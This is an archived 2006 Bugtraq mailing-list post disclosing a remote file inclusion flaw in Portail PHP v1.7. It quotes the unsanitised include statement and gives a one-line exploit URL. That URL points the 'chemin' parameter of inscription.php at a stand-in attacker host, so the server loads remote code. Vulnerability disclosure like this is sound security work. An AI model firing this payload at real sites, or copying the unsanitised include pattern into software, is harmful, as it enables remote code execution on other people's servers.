Portail PHP v1.7 Remote File Include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Portail PHP v1.7 Remote File Include
From: Meftun@xxxxxxxxxxxxx
Date: 28 Jul 2006 10:31:24 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Portail PHP v1.7 <- (chemin) Remote Inclusion Vulnerability

#Author: #######################
         #########C-W-M#########
         ###www.meftunnet.com###
         #########TURKEI########
         #######################

#script: Portail PHP

#Class : Remote

#cont@ct: meftun[at]meftunnet[dot]com

#CODE:    include ("$chemin/include/config.php")

#Exploit:
http://www.site.com/[path]/mod_membre/inscription.php?chemin=http://evil_scripts?

#Thanx : Www.HackMaster.Us

#Greetz: RooTTeR, XYU, Cyborg, BuZuL and all Hackmaster.Us Users

Prev by Date: [SECURITY] [DSA 1128-1] New heartbeat packages fix local denial of service
Next by Date: [OpenPKG-SA-2006.016] OpenPKG Security Advisory (ruby)
Previous by thread: [SECURITY] [DSA 1128-1] New heartbeat packages fix local denial of service
Next by thread: Re: Portail PHP v1.7 Remote File Include
Index(es):
- Date
- Thread